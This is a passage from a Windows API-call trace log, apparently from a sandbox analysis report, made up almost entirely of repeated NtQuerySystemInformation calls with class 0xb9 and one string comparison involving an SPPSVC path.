SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0238.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0238.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9c0, Length=0x20, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9d0, Length=0x20, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0238.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0238.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0238.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0238.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0238.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0238.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0238.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0238.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb80, Length=0x50, ResultLength=0x0) [0238.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.840] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea70, Length=0x50, ResultLength=0x0) [0238.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7d0, Length=0x28, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e840, Length=0x28, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9a0, Length=0x38, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e820, Length=0x20, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e7b0, Length=0x20, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.192] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f030, Length=0x40, ResultLength=0x0) [0239.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef50, Length=0x30, ResultLength=0x0) [0239.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee58, Length=0x30, ResultLength=0x0) [0239.194] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edc0, Length=0x38, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebb0, Length=0x28, ResultLength=0x0) [0239.195] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.195] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec30, Length=0x50, ResultLength=0x0) [0239.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.196] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.198] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e990, Length=0x28, ResultLength=0x0) [0239.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.199] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0239.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0239.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0239.223] NtQuerySystemInformation 